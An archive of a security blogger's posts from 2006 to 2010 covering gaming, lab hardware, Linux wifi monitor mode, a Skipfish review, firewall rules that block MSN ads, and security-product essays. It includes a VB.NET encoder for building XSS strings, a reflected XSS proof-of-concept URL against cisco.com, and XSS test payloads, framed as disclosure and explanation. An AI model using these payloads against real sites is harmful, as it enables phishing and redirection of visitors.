Thursday, July 29, 2010

Starcraft 2 - 0day Download Experience - Boosted

The wonderful Starcraft 2 Wings of Liberty was released earlier this week, and as a hardcore fan of the original game I wanted to get it just as it rolled out, which meant downloading a digital copy.

If you happen to know Blizzard (the magnificent!), their distribution tool is based on 2 channels: one is a direct downloader over HTTP, and the other is P2P based. The P2P channel is the main issue when a new game rolls out, since there weren't enough people who could share parts yet, which left my download (in Israel) at 90Kbps total, about 900Kbps under my acceptable rate.

So I decided to go for the following: first I would download over a VM in the normal way (so I could share like a normal user), but I wanted to play right away (why else would I buy on day 0? :) so I had a second download running at the same time on my main computer, which I wanted to "tweak".

The direction for my main computer was to disable the P2P vector so it would download only from the HTTP source, which then climbs to the line's limits, and so I did.

Looking into the downloader's log, I found the tracker (the distributor of the peer list used to connect the P2P users) to be http://eu.tracker.worldofwarcraft.com

Then I ran a DNS lookup on the FQDN eu.tracker.worldofwarcraft.com and got back a single resolution: 80.239.178.125

In the following step I configured a firewall rule to block any traffic from my computer to that IP address, in order to prevent the sharing distribution. (A rule on a single IP only holds as long as the name keeps resolving to that one address; if peer connections reappear later, repeat the lookup and extend the rule.)

The result was immediate: a few seconds after the rule was configured, the P2P connections dropped and the entire download reverted to HTTP, which made the download climb to 500KBPS and eventually to 1.1MBPS.

So I still let the VM download, so I would share the bits and let other users play, but I also started enjoying this fantastic game right away!

Way to go Blizzard !


Friday, March 26, 2010

first impressions of Google’s Skipfish WVS

After getting really interested in a recent Google project, I spent a few hours today with Google's Skipfish v1.25b, a Google project for a web application security scanner, or as it is sometimes called in the professional arena a WVS (web vulnerability scanner), and completely open source, as I like it.

As mentioned, I am playing with version 1.25b (although 1.26b is available at the time of writing) against a vulnerable demo web application that I wrote a few months back... and got some impressions of the current version.

First of all, I have to admit it is blazing fast... once given a destination to scan, the scan is quick and the results are displayed in a very elegant way (although a bit too hardcore); moreover the depth and methods of detecting problems are quite impressive.

That being said, the security checks themselves missed lots of the application's vulnerabilities, including some quite basic SQL injections which were there specifically for security demonstrations. But I will give it credit and wait until this tool matures a little more before I try it again, and I am sure it will be much better.

The report is excellent, very insightful, and shows the trace of the request stream up to the point where the vulnerability was detected, which is always good. Nevertheless, I would like to see in future versions some other report export mechanisms, such as XML and PDF, to make it more usable in the IT security ecosystem.

There is a point to remember: at the current time it is being written and managed by one person at Google, compared to enterprise tools such as IBM's Rational AppScan or Qualys etc., so you have to give credit here :)

For ease of use, it is easy, but I do expect a UI, since most people that will run this scanner will require some interaction with it that does not demand any CLI / Linux skills, since that is not in their job requirements; they just need to run a tool and test for a baseline (unfortunately that also includes lots of "consultants").

If I am to rate this tool, I would rate its current version (1.25b) at 6.5 out of 10 for now, since I really like the speed and the overall architecture of it, but I do see the need for some more maturity and some more robust security tests.

It detected 9 of 14 SQLi and 4 of 8 XSS, and none of the 4 persistent XSS vulnerabilities (although it claims to detect them)... and yes, I fed it credentials as needed.

It's a decent alternative to lots of the tools out there even in its current stage, and I would definitely go back to it once some holes are put to its belt.

 

Finally, just a quick install HOW-TO for it.
If you want to install it under CentOS (I used 5.2) then do the following:

1. download and extract the tgz file anywhere (example: tar zxpfv skipfish*.tgz)
2. install the packages necessary for the build:

- yum install gcc
- yum install openssl-devel
- yum install libidn-devel

3. step into the extracted folder and run: make
4. there you go. :)


Thursday, March 04, 2010

My New ESXi Lab System

For a while now I have been thinking about building a lab server at home that will save me time and effort for my day-to-day dev and other tech stuff, and I decided to go with VMware's ESXi solution for a virtual environment.

My basic requirements were :

  1. need to run at least 6 resource demanding machines at the same time
  2. need for virtual networking
  3. silence in my lab
  4. performance.

After some spec digging , I finally went for the following spec :

  • Motherboard : Gigabyte GA-X58A-UD3R
  • Memory : Corsair 12GB (6x2GB) DDR3 1333
  • CPU : Intel i7 920
  • CPU Cooler : Thermaltake V1-AX CPU Cooler
  • HD : 4x WD Caviar Blue 500GB 7200RPM 16MB WD5000AAKS
  • RAID Controller : Adaptec 2405S
  • Display : Gigabyte HD 4350 512MB GDDR2 DX10.1 HDTV DVI HDMI PCI-E
  • Case : Antec Nine Hundred Two
  • PSU : Thermaltake ToughPower W0103 600W PFC
  • Additional NIC : Intel PRO/1000 GT Desktop Adapter

Although the motherboard of my choice includes 3 (!) built-in RAID controllers for different RAID approaches, I had to introduce a more robust RAID controller that would support my demand for performance (RAID 10), offload the CPU cycles to a dedicated processor, and also be supported by VMware ESXi, which is not trivial. The same reason goes for the additional NIC: the Intel PRO/1000 is there so that all drivers and hardware in my box are officially on the ESXi hardware compatibility list.

Some design decisions :

  • First, I wanted to make sure that the network card is officially supported, because as of now VMware only supports specific certified hardware (an up-to-date list of supported hardware can always be found here), and the problematic ones are always the network controller and the disk controller (which halt the install if the installer doesn't like them). That's why I went with an Intel one, which at the time can be purchased on eBay for around 25-30$.
  • For the disks, I chose 4 x Caviar Blue 500GB disks and wanted to use them as a RAID 10 array, so all in all I get 1TB of extremely fast storage. I chose the Caviar Blue because, unlike the Caviar Green which throttles down to save energy, I need performance, and the Caviar Blue maintains a constant 7200RPM.
  • The network card consumed my one and only PCI slot on the motherboard, so although I was already considering a PCI Express RAID controller, this became an essential part. At first I thought I could try one of the onboard RAID controllers, but VMware rejected them, which in the end was fine, since by introducing the Adaptec card all of the CPU cycles required to maintain the RAID are offloaded to a dedicated processor on the card. Choosing the Adaptec was fairly easy, since I wanted 4 disks in RAID 10 and PCI Express, and then I came across this article from Overclock3d.net which was enough to convince me I was taking the right approach.
  • For the power supply I went, as I always do, with a Thermaltake Toughpower PSU, which I sized based on their online PSU calculator and multiplied by 1.6 as I always do when scaling a PSU.
  • For RAM, I just wanted triple-channel memory, and as much of it as I could get for a decent price. Same for the display: I just had to have a display adapter in, so this was a cheap one with DVI+VGA+HDMI, which made sense to have for future screens if I ever need one on this system.
  • For the chassis, I wanted a box that will be cool, with good airflow and fans, and that will be easy to build a heavy-duty system into. My only complaint is that in order to mount drives I had to take the drive bay out (the bolt holders are hidden), which took some time, but other than that it's an impressive beast. A good review of the box can be found here.

The latest ESXi version at time of install is 4.0U1, which has more than a handful of features.

I am a happy chap today.

 

not one of my standard posts … but hey , its my blog :)

Barry.


Friday, December 18, 2009

Released : JSecurityModule

As a passion, I keep developing side projects and different concepts that have always interested me, and during that process I have always had to build input validation tools to overcome threats like SQL injection or XSS, or even just to make sure that a user enters only the input type I require of him.

That being said, I knew it was easier to just build a simple framework that would hold both valid input type schemes to validate inputs against, and a simple yet robust signature matching engine, giving me one dynamic framework that I can include in any project I build. Finally I decided to just release it to everyone who may find a use for it, and named it JSecurityModule.

Enjoy.


Wednesday, January 21, 2009

A New MSN Phishing ( Identity Theft ) Worm - ENG

[A rewrite of this post in English, due to its importance]

A few days back, I received a nice gift via my MSN IM account: the following link:

http://myparties.piclooks.com/?<user> (where <user> is the infected sender). In this case I got it through MSN, so I don't know whether any other IM is affected.

When clicking on that link you would get a web window asking for your MSN / Hotmail credentials (screenshot not preserved).

That screen immediately raised my suspicion that something was wrong here: an unknown site is asking for my MSN / Hotmail credentials in order to provide me a service which could natively be provided via a normal API... so I started checking.

Viewing the client-side source was very telling, because it shows very simple, almost child-like HTML generated with simple tools.

An IP address (64.34.154.82) was embedded in it, which is not something you would expect from a service; very unusual.

Dissecting the URL down to its basics and just going to piclooks.com gives no actual homepage behind this application (screenshot not preserved).

The summary is very simple: this is most probably a phishing site, and not a very sophisticated one, whose whole purpose is to steal the online identities of those naive enough to play along.

Be careful of this hoax.


Thursday, August 21, 2008

ImperViews

Confessions Of A Dangerous Mind is a blog I started writing at the end of 2006; it actually started in English and was switched to Hebrew when I saw how few bloggers pay attention to the Israeli industry.

Recently I joined the writing team of the information security blog of Imperva, the company I work for; the blog is called ImperViews and various people from the organization write on it.

As a result, I will start splitting my writing between the blogs.

Time will tell where most of the focus goes.

Barry.

 

Confessions Of A Dangerous Mind is a blog I've been writing since late 2006. This blog started out as an English blog and was later moved entirely to Hebrew in order to pay attention to the Israeli industry.

Lately, I have joined Imperva's blogging team for the security blog ImperViews, which is written by different people across the Imperva organization.

Following that decision, I will probably split my writing between this blog and the ImperViews blog... Time will tell where I will put my focus.

- Barry.


Friday, March 07, 2008

Wireless Under Linux : Monitor Mode

As some of you may already know , one of my biggest and oldest hobbies is linux.

As such, the first thing I try with almost any computer / laptop / device I get is a Linux distro on it, to test it for playfulness. But most of the time these computers are not mine, so it's kind of helping guys out along the way.

This past week I was asked a question by a colleague of mine, one I actually get a lot regarding wireless hacking with a Linux box. The question is "how do i set my wifi card to Promiscuous Mode ?", which many new guys on a Linux platform find hard to achieve, and it is very important knowledge for anyone in the pentesting field, or if it is a "hobby".

The reason is pretty simple... when you want to use your card for packet injection and sniffing, you need to put it in a passive mode. On Linux this mode is called "Monitor Mode" (strictly speaking it is not the same as promiscuous mode: promiscuous mode accepts every frame on the network the card is associated with, while monitor mode captures raw 802.11 frames, management frames included, without associating at all). After you do that you can usually fire up any wireless hacking / sniffing program you want.

The problem is that in some cases, trying to set the card to monitor mode by issuing the command iwconfig ath0 mode Monitor will result in an "Invalid Input" or a "Set Mode (8B06)" message on your screen, and any attempt to change that will not be successful, even if you use patched drivers (like MadWifi) and such.

The solution is actually quite simple: use the wlanconfig tool.

In order to change the card's mode to the desired one, first bring it down by issuing ifconfig ath0 down (ath0 is the interface's name), then use the wlanconfig tool by issuing the following commands:

wlanconfig ath0 destroy
wlanconfig ath0 create wlandev wifi0 wlanmode monitor
ifconfig ath0 up

That's it. Your card is now in monitor mode. It is worth reading the mode back with iwconfig ath0 afterwards, since a wlanconfig create that did not take leaves you with an interface that looks up but captures nothing.

To put the card back in its original state, repeat this sequence of commands, but instead of wlanmode monitor choose wlanmode managed.
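The sequence above, wrapped so that the resulting mode is verified rather than assumed. This is an added example and not code from the original post; it assumes the same tools and names the post uses (wlanconfig, iwconfig, ifconfig, the ath0 VAP on top of wifi0), and the iwconfig text in SAMPLE_IWCONFIG is constructed for the offline check, not captured output.

```python
"""Switch a madwifi (Atheros) interface between monitor and managed mode
and verify the result from iwconfig.

Added example, not code from the original post. It assumes the tools and
names the post uses (wlanconfig, iwconfig, ifconfig, the ath0 VAP on top
of wifi0); SAMPLE_IWCONFIG is constructed for the offline check.
"""
import re
import subprocess
from typing import List, Optional

# iwconfig prints e.g. "Mode:Monitor  Frequency:2.437 GHz ..."
MODE_RE = re.compile(r"\bMode:(\w+)")


def parse_mode(iwconfig_output: str) -> Optional[str]:
    """Return the Mode value iwconfig reports for one interface, or None."""
    m = MODE_RE.search(iwconfig_output)
    return m.group(1) if m else None


def wlan_commands(iface: str, mode: str, parent: str = "wifi0") -> List[List[str]]:
    """The command sequence from the post: bring the VAP down, destroy it,
    re-create it on the parent device in the requested mode, bring it up."""
    if mode not in ("monitor", "managed"):
        raise ValueError("mode must be 'monitor' or 'managed'")
    return [
        ["ifconfig", iface, "down"],
        ["wlanconfig", iface, "destroy"],
        ["wlanconfig", iface, "create", "wlandev", parent, "wlanmode", mode],
        ["ifconfig", iface, "up"],
    ]


def set_mode(iface: str, mode: str, parent: str = "wifi0") -> str:
    """Run the sequence (needs root) and check that iwconfig agrees afterwards.

    Silent failure is the usual problem here, so the mode is read back
    rather than trusted; a mismatch raises instead of returning quietly.
    """
    for cmd in wlan_commands(iface, mode, parent):
        subprocess.run(cmd, check=True)
    out = subprocess.run(["iwconfig", iface], capture_output=True,
                         text=True, check=True).stdout
    expected = "Monitor" if mode == "monitor" else "Managed"
    got = parse_mode(out)
    if got != expected:
        raise RuntimeError(f"{iface}: wanted Mode:{expected}, iwconfig reports Mode:{got}")
    return got


# Constructed sample of what iwconfig prints once the VAP is in monitor mode.
SAMPLE_IWCONFIG = (
    'ath0      IEEE 802.11g  ESSID:""  Nickname:""\n'
    "          Mode:Monitor  Frequency:2.437 GHz  Access Point: Not-Associated\n"
    "          Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=1/1\n"
)

if __name__ == "__main__":
    import sys
    iface = sys.argv[1] if len(sys.argv) > 1 else "ath0"
    mode = sys.argv[2] if len(sys.argv) > 2 else "monitor"
    print(set_mode(iface, mode))
```

Run as root with `python3 monitor.py ath0 monitor` (or `managed` to revert); the script exits with an error instead of reporting success if iwconfig still shows the old mode.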

Hope this short guide was helpful.


Saturday, December 08, 2007

The Code, as Requested - XSS Translator

A few months ago I wrote, for Guy Mizrahi's XSS month, a relatively simple tool whose purpose was basically to convert plain strings to decimal, and thus make building strings for XSS attacks easier...

Several people asked for the (relatively simple) code; well, I changed a few things following emails and comments in all sorts of places, to simplify. Here it is, plain and simple... as you can surely see, all in all it is conversions from hex to decimal form and back, now for the whole string, a change made following requests by email.

There are many converters available for download on the internet, some even written by RSnake himself, but whoever knows me knows that if it didn't come from my own hands, I don't move on to the next topic...

Here is the final code... .NET, as you like it.

 

For my English-reading audience: this is my code for converting text into decimal codes for applying XSS attacks, in .NET for your convenience. Enjoy...

 

Public Class XSS_Translator

    ' Decodes one "%XX" token: the two hex digits after the percent sign become one character
    Public Function hex2dec(ByVal hextext As String) As String
        hex2dec = Chr(Convert.ToInt32(Mid(hextext, 2, 2), 16))
    End Function

    ' Act = 1 : percent-hex encode every character ("a" becomes "%61")
    ' Act = 2 : decode "%XX" tokens back into characters, copying anything else through
    Public Function myConvert(ByVal INPUT As String, ByVal Act As Integer) As String
        Dim myresult As String = ""
        Dim i As Integer

        For i = 1 To Len(INPUT)
            If Act = 1 Then
                ' Hex() drops the leading zero below 16, so pad to two digits;
                ' otherwise a tab encodes as "%9", which hex2dec cannot read back
                myresult = myresult & "%" & Right("0" & Hex(Asc(Mid(INPUT, i, 1))), 2)
            Else
                ' only treat "%" as an escape when two more characters follow it
                If (Mid(INPUT, i, 1) = "%") And (i <= (Len(INPUT) - 2)) Then
                    myresult = myresult & hex2dec(Mid(INPUT, i, 3))
                    i = i + 2   ' skip the two hex digits just consumed (assigning the loop counter is allowed in VB)
                Else
                    myresult = myresult & Mid(INPUT, i, 1)
                End If
            End If
        Next
        myConvert = myresult
    End Function

    ' Form handler: RadioButton1 selects encoding, otherwise decoding
    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
        If RadioButton1.Checked = True Then
            outputBox.Text = myConvert(inputBox.Text, 1)
        Else
            outputBox.Text = myConvert(inputBox.Text, 2)
        End If
    End Sub

End Class
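The same conversions as an added Python example (not the VB.NET tool above, and not code from the original post). It generalises the tool in two ways: besides the percent-hex (%XX) form the tool produces, it also emits and decodes HTML decimal numeric character references (&#NN;), which is the "decimal" form usually meant in XSS work; and it handles the two edge cases the tool does not, namely hex values below 0x10 (padded to two digits) and a "%" that is not followed by two hex digits (left untouched instead of throwing). The function names are this example's own.

```python
"""Encoders and decoders for building XSS test strings.

Added example in Python, not the VB.NET tool from the post. Covers the
percent-hex (%XX) form the original produces plus HTML decimal numeric
character references (&#NN;); pads short hex values and leaves a stray
'%' alone instead of failing on it.
"""
import re

HEX2 = re.compile(r"[0-9A-Fa-f]{2}")
DEC_REF = re.compile(r"&#(\d+);?")   # the trailing ';' is optional in browsers


def to_percent_hex(text: str) -> str:
    """'<a>' -> '%3C%61%3E'; every UTF-8 byte becomes exactly one two-digit %XX token."""
    return "".join("%%%02X" % b for b in text.encode("utf-8"))


def from_percent_hex(text: str) -> str:
    """Inverse of to_percent_hex; a '%' without two hex digits after it stays literal."""
    out = bytearray()
    i = 0
    while i < len(text):
        if text[i] == "%" and HEX2.fullmatch(text[i + 1:i + 3]):
            out.append(int(text[i + 1:i + 3], 16))
            i += 3
        else:
            out.extend(text[i].encode("utf-8"))
            i += 1
    return out.decode("utf-8", errors="replace")


def to_decimal_refs(text: str) -> str:
    """'<' -> '&#60;'; useful where the sink is an HTML text or attribute context."""
    return "".join("&#%d;" % ord(ch) for ch in text)


def from_decimal_refs(text: str) -> str:
    """Decode &#NN; (or &#NN without the ';') back to characters, as a browser would."""
    def repl(m):
        cp = int(m.group(1))
        return chr(cp) if cp <= 0x10FFFF else m.group(0)
    return DEC_REF.sub(repl, text)


def convert(text: str, act: int) -> str:
    """Same interface as the original tool: act 1 encodes, anything else decodes (percent-hex)."""
    return to_percent_hex(text) if act == 1 else from_percent_hex(text)


if __name__ == "__main__":
    payload = "<img src=x onerror=alert(1)>"
    for enc, dec in ((to_percent_hex, from_percent_hex), (to_decimal_refs, from_decimal_refs)):
        encoded = enc(payload)
        print(encoded)
        assert dec(encoded) == payload
```

Percent-hex is what a URL parameter sink will decode for you; decimal references are decoded by the HTML parser, so they only help when the payload lands in HTML text or an attribute value that the page later interprets as markup.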


End of Year 2007

The end of 2007 is approaching (even by Cisco's count), and with it the obligatory summary of the information security events of 2007 and the trends that were, or turned out not to be...

I would be happy to get your input before I write up and publish such a post.

 

While 2007 is coming to an end soon (even by Cisco's calendar), a summary of all the security events, trends and things that went wrong is just around the corner...

I would love to get some of your input on this, so my summary will be more complete when it's finally out.

 


Thursday, September 27, 2007

Cisco.com XSS Vulnerability Found

A few days back, I read about a cross-site scripting vulnerability in Cisco's search engine. This vulnerability enables an attacker to use the cisco.com website for phishing purposes and for "man-in-the-browser" attacks.

With the code (posted as a link) below, one could send a user to Cisco's website and bounce him off to his own bogus machine. I did not check for any further enrichments of this exploit, but it seems strange that this kind of thing could come out on a website as secure as cisco.com. I really believe there are application-layer firewalls defending Cisco's website, and if there are, are they misconfigured?

I have reported this vulnerability to a friend of mine on Cisco's security professional services team in EMEA, and I hope it will soon be fixed.

Here is the PoC code:

http://cisco.com/pcgi-bin/search/search.pl?searchPhrase=%27+onmouseover%3D%22location.href%3D%28%27http%3A%2F%2Fwww.cnn.com%27%29%22+value%3D%27&x=20&y=15&accessLevel=Guest&language=en&country=US&Search+All+Cisco.com=cisco.com

Notice that the code bounces you to the www.cnn.com website, but anything can be put there. Which makes you wonder... Look at the shape of the searchPhrase value: it opens with a single quote and ends with value=', so it closes the attribute the search phrase is echoed into and smuggles in an onmouseover handler; the page is reflecting the phrase into an HTML attribute without encoding it.
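What that payload does to the page, and what the fix looks like, as an added example (not Cisco's search.pl and not code from the original post). The search form is modelled here as a one-line template that echoes the phrase back inside value='...'; that the real page did exactly that is an assumption inferred only from the shape of the PoC, and POC_URL is the URL quoted above.

```python
"""Attribute-breakout reflected XSS, shown on a model of the search form.

Added example, not Cisco's search.pl or any code from the post. The form
is assumed to echo the phrase inside value='...'; POC_URL is the URL the
post quotes.
"""
from html import escape
from html.parser import HTMLParser
from typing import List
from urllib.parse import parse_qs, urlparse

POC_URL = (
    "http://cisco.com/pcgi-bin/search/search.pl?searchPhrase="
    "%27+onmouseover%3D%22location.href%3D%28%27http%3A%2F%2Fwww.cnn.com%27%29%22+value%3D%27"
    "&x=20&y=15&accessLevel=Guest&language=en&country=US&Search+All+Cisco.com=cisco.com"
)


def search_phrase(url: str) -> str:
    """The decoded searchPhrase parameter, as the server-side script sees it."""
    return parse_qs(urlparse(url).query)["searchPhrase"][0]


def render_vulnerable(phrase: str) -> str:
    """Raw concatenation into a single-quoted attribute: a ' in the input closes
    the attribute and whatever follows becomes new attributes of the tag."""
    return "<input type='text' name='searchPhrase' value='%s'>" % phrase


def render_fixed(phrase: str) -> str:
    """escape(quote=True) rewrites ' " < > & so the whole phrase stays inside value."""
    return "<input type='text' name='searchPhrase' value='%s'>" % escape(phrase, quote=True)


class _Attrs(HTMLParser):
    """Collects attribute names the way a browser's parser would assign them."""

    def __init__(self) -> None:
        super().__init__()
        self.names: List[str] = []

    def handle_starttag(self, tag, attrs):
        self.names.extend(name for name, _ in attrs)


def attribute_names(markup: str) -> List[str]:
    """Attribute names of every tag in markup, in document order."""
    p = _Attrs()
    p.feed(markup)
    p.close()
    return p.names


if __name__ == "__main__":
    phrase = search_phrase(POC_URL)
    print("decoded payload :", phrase)
    print("vulnerable      :", render_vulnerable(phrase))
    print("  attributes    :", attribute_names(render_vulnerable(phrase)))
    print("fixed           :", render_fixed(phrase))
    print("  attributes    :", attribute_names(render_fixed(phrase)))
```

The parser view is the point: in the vulnerable rendering the browser sees an onmouseover attribute, in the fixed one it sees a single value attribute whose content happens to contain the text "onmouseover". A WAF rule that only looks for the literal string would flag both, which is why output encoding in the right context, not string matching, is the fix.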

Anyway, I cannot credit this code to any specific hacker / hacking group, because I have seen similar code at more than one of my sources, each from a different country. Strangely enough, they all came out within the same 24 hours. Script kiddies?

As my Cisco friend promised, this is not a lightweight issue for a company of that size, and I believe the fix will come very soon.

 


Monday, September 17, 2007

MSN Messenger - Ad Block - Revisited


Following some email requests (too many for that specific question) that I've got to help various FortiGate (by Fortinet) owners set their firewall security policy to block MSN advertisements within the client (as a proof of concept ONLY)... and following an old post (posted here on March 13th 2007 - link), I am posting the requested configuration for the machines.

I have decided to re-post this, with a better technical explanation and in English this time, as a gesture to the "Security Bloggers Network" (to which I only post English feeds, and this is one worth mentioning).

The main concept is to block three regex URI patterns from which the Messenger client fetches its advertisements (as you may or may not know, this IM uses HTTP to get things done; well, let's break its path...)

[note: the configuration is made for FortiOS MR5 patch 2 and tested on an FGT60]

As I previously posted, this is a good way of handling Messenger usage within organizations that do not approve of end-user advertisement in their computing environment.

There are two ways of doing it... one through the URL filter engine, and the other through the IPS (which I find a much more exotic way of getting things done, via deep packet inspection).

Method 1 - URL Filter :

1. goto the CLI on the machine and paste the following configuration -

    config webfilter urlfilter
        edit 1
            config entries
                edit "ad.msn.co.il/js.ng"
                    set action block
                next
                edit "rad.msn.com/ADSAdClient31.dll"
                    set action block
                    set type regex
                next
                edit "config.messenger.msn.com/Config/MsgrConfig.asmx"
                    set action block
                    set type regex
                next
            end
            set name "block-msn-ad-engine"
        next
    end

2. choose the "block-msn-ad-engine" within your protection-profile of choice.

Method 2 - IPS :

1. go to the Intrusion Protection >> Signature >> Custom menu and add the following signatures:

  • F-SBID( --name "bs_MSN-AD-Stop.A"; --protocol tcp; --flow established ; --regex "ADSAdClient31.dll"; --no_case)
  • F-SBID( --name "bs_MSN-AD-Stop.B"; --protocol tcp; --flow established ; --content "ad.msn.co.il"; --no_case)
  • F-SBID( --name "bs_MSN-AD-Stop.C"; --protocol tcp; --flow established ; --regex "MsgrConfig.asmx"; --no_case)

2. choose the appropriate severity and include that severity in the desired protection profile.

 

Disclaimer: this is a PoC only; this kind of usage may conflict with the MSN Messenger usage agreement, and I am not to take any responsibility for any unethical or illegal usage of this article and the information it provides. And although I think using this information to violate any EULA or other agreement is wrong, if you use it, you are taking responsibility for it.

I am not sure there is any violation, since all this solution does is change the availability of web data to an application, so basically treating the application as a user on the network and denying it access to some internet content. Legitimate, isn't it?


Friday, September 14, 2007

Security Bloggers Network

At the request of Mr. Alan Shimel, VP of Strategic Development at the American company StillSecure and author of one of the more reliable and higher-quality blogs in the industry (link here), I have joined the worldwide information security bloggers network called SBN. This network is considered relatively reliable in terms of the kind of people linked to it, so I was happy to receive this offer from Mr. Alan and join.

A link to the Security Bloggers Network is here.

As a gesture, I see fit to add the banner of this network to the blog's menu (bottom right), and I hope my blogging line will work to broaden horizons abroad as well. By the way, this means there will occasionally be posts in English here. At least more than usual.


Following Alan Shimel's proposal to join the SBN ("Security Bloggers Network") a few months back, after getting some feedback from Richard Stiennon on my article about UTM and the follow-up by Alan Shimel, and because of some path changes I have decided to take recently, I am proud to say that I am a shiny new member of the SBN, and I hope to bring the voice of Israeli information security expertise to the broader public of security, networking and system professionals.

I have added the SBN widget to my sidebar in order to let the Israeli crowd. This means that although I usually write in Hebrew, I will most definitely write in English more often. Thank you Alan.


Wednesday, July 18, 2007

I Would Like To Thank Mr Richard Stiennon

Friends, I would like to thank Mr. Richard Stiennon, currently CMO of Fortinet and formerly a senior information security analyst at Gartner.

Richard met with me in Israel a few months ago during a Fortinet conference at which I spoke, and he is the author of one of the best information security blogs in the world, ThreatChaos, which I value greatly.

Richard is considered today among the 50 most influential people in the global industry in everything related to information security in data communications, and yesterday he chose to write a post on his site referring to an article I published here in English in the past (link to the article) and to mention me in a blog read by hundreds of thousands of people a month; I want to thank him personally.


Link to the article on Richard's blog
Another link to the article he wrote, parallel to mine

A follow-up was also written on another blog - link here


Thank you Richard for your comment, and for your post about UTM.
Keep on writing great columns.


Tuesday, July 10, 2007

Fedora 7 on HP nc2400



All of my Hebrew readers, please excuse me, but because I want to make this post handy for other nc2400 users I will post it in English.

I have got my hands on a new HP nc2400 laptop that replaced my older Dell D620, and here is how I set up Fedora 7 on it.

First of all... I must admit almost everything worked out of the box, which is quite amazing for a branded laptop... maybe the only two things that didn't work were the Intel PRO/Wireless 3945 (rev 2.0) wireless card and the AuthenTec fingerprint reader. Well, since I do not use the fingerprint reader I did not even set it up, so excuse me, all of you fingerprint users.

My setup is quite simple: GNOME with Beryl, a 2.6 kernel and the rest are networking / pentesting tools... not worth mentioning.

wifi -
I am thinking of how to give you the easiest way to bring it up...
well, it's easy...

First edit the file /etc/modprobe.d/blacklist and add the following lines:
--
#IPW3945
blacklist iwl3945
blacklist mac80211
--

and reboot...
then add the "freshrpms.net" repository and run "yum search ipw3945".
Install the dkms package, the ipw3945d package and the ipw3945 firmware package...
reboot and you're done.

The 12.1 inch resolution was also automatic, so no need for the 915resolution tool. You may want to install the wpa_supplicant tool in order to connect to WPA2 more easily.

I would also recommend running the NetworkManager tool to manage the network connections from within GNOME. I personally disabled the automatic DHCP on eth1 (the wifi interface) via the /etc/sysconfig/network-scripts/ifcfg-eth1 file.

That's about it. Everything is running fine, yum update ran perfectly, and it's a go from now on.

enjoy linux.


Tuesday, December 05, 2006

How To Assure yourself by Common Criteria


There is a great deal of gray area around Common Criteria certifications, not because there is anything wrong with them but the opposite: RFPs go out for answers without asking for any legitimate source of information about the capabilities of the product they request.

What happens is as follows:
When a firm/company needs a technological product, let's say a firewall, they put out the specifications they require and ask for a certain throughput, VPN capabilities, content inspection capabilities and so on. The integration/product provider usually answers the RFP by applying best knowledge and whitepaper cut-outs.

In that way the firm/company that requested the product may get a product that is cheap and answers all the required technical specifications, but the product itself is poorly implemented and written, while its documentation says it supports just about everything and that the product is "very secure and hardened".

Common Criteria comes in as a legitimate standard for checking the entire process of product development, deployment and benchmarking, thereby giving a certification to a product in such a way that a customer can rest assured he is getting a product that passed at least a certain level of standard checks.

The 7 levels of Common Criteria assurance are known as EAL, "Evaluation Assurance Level", and are marked as such:
a product that reached EAL 4 may carry the certificate "EAL4 Certified".

Therefore, when issuing an RFI/RFP, one should request a minimum EAL for the product; that way the company assures itself it gets a product that satisfies its needs. One caveat is worth keeping in mind: the EAL measures how rigorously the product was evaluated against the claims in its own Security Target, not how much security functionality it has, so the Security Target (or the Protection Profile it conforms to) should be read alongside the level.

There is some great information at the Common Criteria portal
("http://www.commoncriteriaportal.org"). For instance, you can read the user guide and get familiar with the different
EAL levels and the way each level is checked:
http://www.commoncriteriaportal.org/public/files/ccusersguide.pdf
http://www.commoncriteriaportal.org/public/files/ccintroduction.pdf

As a security engineer, when a customer asks me for consultancy about a product or solution for securing an element of his IT/IS, my first question about the product will always be: "What is its CC-EAL certification level?"

Always remember: when a standard is requested and the product/solution you get is certified to that standard, you usually get what you pay for, nothing less, maybe more.


Monday, December 04, 2006

UTM – Antithesis For The Current Concept Technology


The world of IT security technologies has evolved greatly for the last 5 years.
By understanding the structure of the current threats that threatens the IT environment of corporate infrastructure – security vendors have created very highly crafted technologies to deal with these threats. We had some major breakthroughs with IPS technologies that currently serves both signature based and proactive scanning methods, Antivirus and AntiSpam technologies can now inspect information to the deepest levels . and there are more than enough URL filtering mechanisms that serves about every major company that require these kind of services to be implemented on their users surfing habits.

UTM is something pretty fresh In that aspect, we’ve seen it growing In the last
couple of years as a major aspect for creating “All-In-One” solutions. The concept is
brought to life by taking one machine that is taking care of stateful firewalling , advanced routing ,IPSec connectivity, and giving it the extra edge by allowing it to connect to modules such as the IPS, AntiSpam, Antivirus and the URL Filtering mechanism to create a full blown inspection gateway that scans just about everything that passes through it, and decide based on scan results if to pass the traffic or rather stop and log it and that point of entry.
Now lets look at the problem. By the UTM concept – our IT should be “secured”
If we are using a UTM device at our core network environment . but – what about
blended threats ? , what about attack and code mutations?
In the second half of 2005 , many analysts and security engineers have faced new
types of attacks , the blended ones , and the mutated ones. These attacks were crafted to skip from one method to the other , from one technology to the other , and IT security measures where if you had a virus , an antivirus solution would have taken care of it, And if you had a DoS attack , the Firewall would have taken care of it , but when an attack would have begun as an Exploit that injects a virus that later on sends out spam and infects other entities via IM , or via SMB – systems are useless to these attacks.

The problem with the UTM concept today – is that companies that manufacture
these solutions , are applying OEM solutions with other vendors . one could OEM with
the best-of-breed antivirus company for his AV module , and OEM with the best-of-breed IPS company for the IPS module and pass the traffic through the both of them . but ! and here is the problem – the modules of different vendors , could not speak to each other . each module of its own honorable vendor is written as a closed source application and can receive traffic from one end , check it and pass it through , but when the IPS module and AV module co-exist but cannot take mutual decisions on the traffic that passes through – blended threats could not be inspected in any way . mutations of the traffic will pass as if there was nothing there to stop them.

Let me explain further. When the UTM device is used to establish a layer 3 to layer 7 connection between two entities, it inspects the traffic. Now, consider a mutation attack of some kind (this is just an example): a session is established via VPN between two entities and runs just HTTP traffic between the two. The IPSec termination is done by the UTM device, which up to this point cannot see whether an attack was hidden in the traffic that came through the IPSec tunnel. Then the data reaches the HTTP server carrying a 0day exploit, so the IPS does not know it, and it sends a file that the UTM device previously accepted because of the tunnel's access control rules. The file contains a virus, and the attacking entity passes it on through an IM service. The newly crafted virus then propagates itself not via IM but via SMB, and when that occurs, the virus alters itself to attack the core switch with a simple DDoS attack. No UTM device would stop this attack; no single entity taking care of one module would stop it.

